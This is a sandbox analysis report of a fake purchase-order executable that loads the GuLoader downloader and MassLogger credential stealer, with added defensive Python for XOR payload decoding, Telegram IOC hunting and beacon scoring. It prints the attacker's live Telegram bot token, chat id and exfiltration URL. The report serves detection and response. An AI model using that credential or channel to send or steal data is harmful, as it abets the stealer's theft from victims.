Windows Analysis Report: PURCHASE ORDER TRC-090971819130-24_pdf.exe

Overview

General Information

Detection

Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |

Signatures

Classification
- System is w10x64
- PURCHASE ORDER TRC-090971819130-24_pdf.exe (PID: 1532, cmdline: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe", MD5: 745504717878BB22B600DF7E2C2DD9F4)
- PURCHASE ORDER TRC-090971819130-24_pdf.exe (PID: 4796, cmdline: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe", MD5: 745504717878BB22B600DF7E2C2DD9F4)
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | |
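The family description above notes that the payload GuLoader fetches is XORed. The following is an added example, not code from Joe Sandbox or from GuLoader, of the standard analyst move for that situation: recover a repeating XOR key from the downloaded blob using the known plaintext every PE carries (the "MZ" magic and the DOS stub text), then confirm the result with a structural PE check. It assumes a single repeating key of unknown length, which is the simple case the description refers to; a payload using any other scheme fails the check and the function returns None. The PE image, the key and the offsets tried are all constructed for the example.

```python
"""Recover a repeating XOR key from an XOR-encoded PE payload with known plaintext.

Added example, not code from Joe Sandbox or from GuLoader. Assumes the payload
is a PE image XOR-encoded with one repeating key; the image and key below are
constructed for the example.
"""
from __future__ import annotations

import struct

# Text of the standard MS linker DOS stub: 39 bytes of high-confidence known
# plaintext that normally sits at offset 0x4E, right after the stub code.
DOS_STUB_TEXT = b"This program cannot be run in DOS mode."


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(image: bytes) -> bool:
    """Structural check: 'MZ' at 0, e_lfanew in range and 'PE\\0\\0' at e_lfanew."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(image) - 4 and image[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def derive_key(blob: bytes, key_len: int, stub_off: int) -> bytes | None:
    """Derive key bytes from 'MZ' at offset 0 and the stub text at stub_off.

    Each known plaintext byte fixes one key slot (position mod key_len). A slot
    that receives two different values means the guessed length or offset is wrong.
    """
    key: list[int | None] = [None] * key_len
    for off, plain in ((0, b"MZ"), (stub_off, DOS_STUB_TEXT)):
        for i, p in enumerate(plain):
            pos = off + i
            if pos >= len(blob):
                return None
            slot, k = pos % key_len, blob[pos] ^ p
            if key[slot] is not None and key[slot] != k:
                return None
            key[slot] = k
    if any(k is None for k in key):
        return None
    return bytes(k for k in key if k is not None)


def recover_xor_key(blob: bytes, max_key_len: int = 64) -> bytes | None:
    """Try key lengths and stub offsets; accept the first key that yields a valid PE.

    Keys longer than the known plaintext cannot be fully derived this way, so the
    search stops at len(DOS_STUB_TEXT). Shorter lengths are tried first, which
    returns the minimal period of the key.
    """
    for key_len in range(1, min(max_key_len, len(DOS_STUB_TEXT)) + 1):
        for stub_off in range(0x40, 0x80):  # stub text offset varies by linker
            key = derive_key(blob, key_len, stub_off)
            if key is not None and looks_like_pe(xor_bytes(blob, key)):
                return key
    return None


def build_fake_pe(body_len: int = 512) -> bytes:
    """Constructed minimal PE-shaped image: DOS header, stub, PE signature at 0x80."""
    img = bytearray(b"MZ") + bytes(0x3C - 2)
    img += struct.pack("<I", 0x80)                                       # e_lfanew
    img += b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"  # stub code
    img += DOS_STUB_TEXT + b"\r\r\n$"
    img += bytes(0x80 - len(img))
    img += b"PE\0\0" + struct.pack("<HH", 0x14C, 3)                      # i386, 3 sections
    img += bytes((i * 37 + 11) & 0xFF for i in range(body_len))          # filler "code"
    return bytes(img)


SAMPLE_KEY = bytes.fromhex("5a13c72e91")  # constructed 5-byte key
ENCODED_PAYLOAD = xor_bytes(build_fake_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_xor_key(ENCODED_PAYLOAD)
    print("recovered key:", key.hex() if key else None)
```

The structural check matters more than the derivation: a wrong (length, offset) guess that happens to be internally consistent still produces garbage, and "MZ" alone is two bytes of evidence. Requiring e_lfanew to land on "PE\0\0" after decoding rejects those cases cheaply before any deeper parsing.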
Malware configuration (extracted):

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
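The configuration above is the whole exfiltration channel: a Telegram bot token, a chat id and the sendMessage endpoint. The following is an added example, not code from the report or from the malware, of turning that into a hunt across other artefacts (process memory, pcap text, dropped configs): it recognises the token format, recovers method and chat id when the token appears inside a Bot API URL, and scans raw bytes as both ASCII and UTF-16LE so wide strings from .NET/VB process memory are not missed. The scanned blob is constructed for the example; the token and chat id in it are the values from the configuration above, the decoy is made up.

```python
"""Hunt for Telegram Bot API exfiltration IOCs in strings from memory, pcap text or configs.

Added example, not code from the Joe Sandbox report or from the malware.
The scanned blob below is constructed; its token and chat id are the values
from the extracted configuration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# A bot token is "<numeric bot id>:<35 URL-safe chars>". The bot id is public
# (it is the bot's user id); the part after the colon is the secret that lets
# anyone call the Bot API as that bot, so treat it as a credential.
TOKEN = r"(\d{8,10}):([A-Za-z0-9_-]{35})"
TOKEN_RE = re.compile(r"(?<![A-Za-z0-9_-])" + TOKEN + r"(?![A-Za-z0-9_-])")
API_RE = re.compile(r"https?://api\.telegram\.org/bot" + TOKEN + r"/(\w+)[^\s\"'<>]*")


@dataclass(frozen=True)
class TelegramIoc:
    bot_id: str
    token: str
    method: str | None   # Bot API method seen in a URL (sendMessage, sendDocument, ...)
    chat_id: str | None  # destination chat if it appeared as a query parameter


def extract_telegram_iocs(text: str) -> list[TelegramIoc]:
    """Return one IOC per distinct token; URL hits also carry method and chat id."""
    found: dict[str, TelegramIoc] = {}
    for m in API_RE.finditer(text):
        token = f"{m.group(1)}:{m.group(2)}"
        query = parse_qs(urlsplit(m.group(0)).query)
        chat_id = query.get("chat_id", [None])[0]
        found[token] = TelegramIoc(m.group(1), token, m.group(3), chat_id)
    for m in TOKEN_RE.finditer(text):
        token = f"{m.group(1)}:{m.group(2)}"
        found.setdefault(token, TelegramIoc(m.group(1), token, None, None))
    return list(found.values())


def scan_memory(data: bytes) -> list[TelegramIoc]:
    """Scan raw bytes as ASCII and as UTF-16LE (both byte alignments), merge by token.

    A URL hit (with method/chat id) wins over a bare-token hit for the same token.
    """
    views = [
        data.decode("latin-1"),
        data.decode("utf-16-le", errors="ignore"),
        data[1:].decode("utf-16-le", errors="ignore"),
    ]
    merged: dict[str, TelegramIoc] = {}
    for view in views:
        for ioc in extract_telegram_iocs(view):
            prev = merged.get(ioc.token)
            if prev is None or (prev.method is None and ioc.method is not None):
                merged[ioc.token] = ioc
    return list(merged.values())


# Constructed sample "memory": an ASCII sendMessage request with chat_id, the same
# token as a wide string, and a decoy whose secret is too short to be a token.
SAMPLE_TOKEN = "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc"
SAMPLE_MEMORY = (
    b"\x00\x00GET https://api.telegram.org/bot" + SAMPLE_TOKEN.encode()
    + b"/sendMessage?chat_id=7382809095&text=creds HTTP/1.1\r\n"
    + b"\x90\x90" + SAMPLE_TOKEN.encode("utf-16-le") + b"\x00\x00"
    + b"decoy 1234567890:tooShort\x00"
)

if __name__ == "__main__":
    for ioc in scan_memory(SAMPLE_MEMORY):
        print(ioc)
```

Two practitioner notes. The bot id (the digits before the colon) is a stable pivot that survives token rotation, so it is the part worth keeping in a watchlist. The full token is a live credential for the attacker's bot; the report above prints it in full, which is useful to responders but equally lets anyone else drive that bot.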
Rule | Description | Author |
---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T15:29:42.161159+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:45.902560+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:49.397276+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:52.938425+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:56.563595+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:00.031933+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:08.989401+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:21.477445+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:25.990535+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:30.719693+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:34.215299+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:37.686699+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:42.399185+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:45.840863+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:50.316155+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:53.779170+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:57.250331+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:01.789509+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:07.086493+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T15:29:31.912821+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
2024-12-19T15:29:40.006658+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
2024-12-19T15:29:43.850430+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T15:29:23.912768+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | TCP |
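The first alert table above is worth reading as a time series rather than a list: nineteen TLS connections from 192.168.2.5 to 149.154.167.220:443 roughly every 3.5 s, which matches the api.telegram.org C2 URL in the extracted configuration. The following is an added example, not part of the Joe Sandbox report, of scoring that cadence as beaconing from the rows themselves. ALERT_ROWS is the SID 2057744 table pasted as text; the grouping key, the minimum event count and the jitter threshold are assumptions for illustration and should be tuned locally.

```python
"""Score periodic C2 connections (beaconing) from Suricata alert rows.

Added example, not part of the Joe Sandbox report. ALERT_ROWS holds the
nineteen SID 2057744 alerts from the table above, pasted as text; the
thresholds (min_events, max_jitter_ratio) are assumptions to tune locally.
"""
import statistics
from collections import defaultdict
from datetime import datetime

ALERT_ROWS = """\
2024-12-19T15:29:42.161159+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:45.902560+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:49.397276+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:52.938425+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:29:56.563595+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:00.031933+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:08.989401+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:21.477445+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:25.990535+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:30.719693+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:34.215299+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:37.686699+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:42.399185+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:45.840863+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:50.316155+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:53.779170+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:30:57.250331+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:01.789509+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | TCP |
2024-12-19T15:31:07.086493+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | TCP |
"""


def parse_rows(text: str) -> list[dict]:
    """Parse pipe-separated alert rows; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 9 or not cells[0][:4].isdigit():
            continue
        rows.append({
            "ts": datetime.strptime(cells[0], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(cells[1]),
            "src": cells[4],
            "dst": cells[6],
            "dport": int(cells[7]),
        })
    return rows


def beacon_scores(rows, min_events: int = 8, max_jitter_ratio: float = 0.5) -> dict:
    """Per (src, dst, dport): median inter-connection interval and its jitter.

    Jitter is MAD / median, a robust ratio that stays small for machine-timed
    check-ins and grows for human-driven traffic; the two long gaps in this
    series (about 9 s and 12 s) barely move it, unlike a mean/stddev estimate.
    """
    groups = defaultdict(list)
    for r in rows:
        groups[(r["src"], r["dst"], r["dport"])].append(r["ts"])
    scores = {}
    for key, stamps in groups.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(deltas)
        mad = statistics.median(abs(d - median) for d in deltas)
        jitter = mad / median if median > 0 else float("inf")
        scores[key] = {"events": len(stamps), "median_s": median,
                       "jitter": jitter, "beacon": jitter <= max_jitter_ratio}
    return scores


if __name__ == "__main__":
    for key, score in beacon_scores(parse_rows(ALERT_ROWS)).items():
        print(key, score)
```

Because the destination here is Telegram's public Bot API rather than attacker-owned infrastructure, blocking the IP is a blunt instrument; the cadence computed above and the bot-token path in the URL are the more specific signals to alert on.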
Signature details. Extraction dropped the source and detail cells of the signature rows in the sections below, and some category headings with them, so what remains per section is the evidence type, the number of hits and the code-function IDs (of the form 3_2_32B3D1EC, where the leading number is the sandbox process index and the trailing hex value the function address). Evidence may therefore be listed under the last surviving heading rather than its own.
AV Detection |
---|
- Malware Configuration Extractor: 2 hits
- ReversingLabs: 1 hit
- Integrated Neural Analysis Model: 1 hit
Location Tracking |
---|
- DNS query: 1 hit
- Code function: 3_2_32B3D1EC, 3_2_32B3D9D9
- Static PE information: 1 hit
- HTTPS traffic detected: 1 hit
- HTTPS traffic detected: 3 hits
- Static PE information: 1 hit
- Code function: 0_2_00405846, 0_2_004027FB, 0_2_00406398, 3_2_00405846, 3_2_004027FB, 3_2_00406398
- Code function (51 hits): 3_2_32B303AF, 3_2_32B3C638, 3_2_32B30C28, 3_2_32B3DA9C, 3_2_32B3EBF7, 3_2_32B3E339, 3_2_32B3B07F, 3_2_32B3F042, 3_2_32B3C1E0, 3_2_32B3B930, 3_2_32B3DEE1, 3_2_32B3E79F, 3_2_32B30F6F, 3_2_32B3B4EC, 3_2_32B30C1A, 3_2_32B3BD88, 3_2_3593BDF0, 3_2_35938650, 3_2_35938650, 3_2_35934DB0, 3_2_35932560, 3_2_35931CB0, 3_2_359374C8, 3_2_35936C18, 3_2_35931400, 3_2_35930FA8, 3_2_359367C0, 3_2_35935F10, 3_2_35933F70, 3_2_359336C0, 3_2_35932E10, 3_2_35935660, 3_2_35938193, 3_2_359329B8, 3_2_35932108, 3_2_3593C92F, 3_2_35934820, 3_2_35931858, 3_2_35937070, 3_2_359343C8, 3_2_3593CBE7, 3_2_35933B18, 3_2_35937B52, 3_2_35938373, 3_2_35936368, 3_2_35935AB8, 3_2_35935208, 3_2_35933268, 3_2_35E6E7C8, 3_2_35E6F5D8, 3_2_35E6F316
Networking |
---|
- Suricata IDS: 19 hits
- DNS query: 2 hits
- HTTP traffic detected: 20 hits
- IP Address: 3 hits
- JA3 fingerprint: 3 hits
- DNS query: 2 hits
- Suricata IDS: 3 hits
- HTTP traffic detected: 23 hits
- HTTPS traffic detected: 1 hit
- UDP traffic detected without corresponding DNS query: 6 hits
- HTTP traffic detected: 24 hits
- DNS traffic detected: 5 hits
- HTTP traffic detected: 1 hit
- String found in binary or memory: 30 hits
- Network traffic detected: 44 hits
- HTTPS traffic detected: 3 hits
- Code function: 0_2_004052F3
System Summary |
---|
- Static PE information: 2 hits
- Static file information: 1 hit
- Code function: 0_2_004032A0, 3_2_004032A0
- Code function (107 hits): 0_2_00404B30, 0_2_00407041, 0_2_0040686A, 3_2_00407041, 3_2_0040686A, 3_2_00404B30, 3_2_00154328, 3_2_00158DA0, 3_2_00155968, 3_2_00155F90, 3_2_00152DD1, 3_2_32B303AF, 3_2_32B35328, 3_2_32B3331A, 3_2_32B3C638, 3_2_32B37628, 3_2_32B3CCA0, 3_2_32B3DA9C, 3_2_32B3AAEA, 3_2_32B3EBF7, 3_2_32B3E339, 3_2_32B36B01, 3_2_32B3B07F, 3_2_32B3F042, 3_2_32B37848, 3_2_32B3C1E0, 3_2_32B3B930, 3_2_32B36EA0, 3_2_32B3DEE1, 3_2_32B3E79F, 3_2_32B3A733, 3_2_32B3CC91, 3_2_32B3B4EC, 3_2_32B3BD88, 3_2_3593BDF0, 3_2_35939D10, 3_2_359396C8, 3_2_35938650, 3_2_3593A9B0, 3_2_3593A360, 3_2_3593BA99, 3_2_35934DB2, 3_2_35934DB0, 3_2_3593BDE9, 3_2_35939D00, 3_2_35939D04, 3_2_35939D0D, 3_2_35932550, 3_2_35932560, 3_2_35931CB0, 3_2_35931CA0, 3_2_359374C4, 3_2_359374C8, 3_2_35936C18, 3_2_35931400, 3_2_359367B0, 3_2_359367BC, 3_2_35930FA8, 3_2_359367C0, 3_2_3593AFF8, 3_2_35935F10, 3_2_35933F70, 3_2_35933F60, 3_2_359336B0, 3_2_359396B8, 3_2_359336C0, 3_2_359396C4, 3_2_35932E10, 3_2_3593565F, 3_2_35938642, 3_2_35938647, 3_2_3593864C, 3_2_35935660, 3_2_359329B8, 3_2_3593A9A9, 3_2_359329A8, 3_2_359351F8, 3_2_35932108, 3_2_3593F130, 3_2_3593F129, 3_2_359320F8, 3_2_3593481C, 3_2_35930036, 3_2_35934820, 3_2_35931858, 3_2_35930040, 3_2_35937070, 3_2_359343B9, 3_2_359343C8, 3_2_359313F0, 3_2_35933B18, 3_2_35933B08, 3_2_35937B52, 3_2_3593A351, 3_2_3593A35C, 3_2_35937B62, 3_2_35936364, 3_2_35936368, 3_2_35935AB4, 3_2_35935AB8, 3_2_35935207, 3_2_35935208, 3_2_35933258, 3_2_35933268, 3_2_35E6E7C8, 3_2_35E6D608, 3_2_35E68328
- Code function: 1 hit (ID not preserved)
- Binary or memory string: 2 hits
- Static PE information: 1 hit
- Classification label: 1 hit
- Code function: 0_2_004032A0, 3_2_004032A0
- Code function: 0_2_004045B4
- Code function: 0_2_00402095
- File created: 1 hit
- Mutant created: 1 hit
- File created: 1 hit
- Static PE information: 1 hit
- File read: 1 hit
- Key opened: 1 hit
- Binary or memory string: 1 hit
- ReversingLabs: 1 hit
- File read: 1 hit
- Process created: 3 hits
- Section loaded: 60 hits
- Key value queried: 1 hit
- LNK file: 1 hit
- Key opened: 1 hit
- Static PE information: 1 hit
Data Obfuscation |
---|
- File source: 1 hit
- Code function: 0_2_10001B18
- Code function: 0_2_10002E0E
- File created (dropped file): 1 hit
- Registry key monitored for changes: 2 hits
- Process information set: 61 hits
Malware Analysis System Evasion |
---|
Source: | API/Special instruction interceptor: | ||
Source: | API/Special instruction interceptor: |
Source: | RDTSC instruction interceptor: | ||
Source: | RDTSC instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | API coverage: |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_00405846 | |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406398 | |
Source: | Code function: | 3_2_00405846 | |
Source: | Code function: | 3_2_004027FB | |
Source: | Code function: | 3_2_00406398 |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3761 | ||
Source: | API call chain: | graph_0-3941 |
Source: | Code function: | 0_2_00403C41 |
Source: | Code function: | 0_2_10001B18 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406077 |
Source: | Key value queried: | Jump to behavior |
Lowering of HIPS / PFW / Operating System Security Settings |
---|
Source: | Registry value created: | Jump to behavior |
Source: | Registry key created or modified: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 215 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
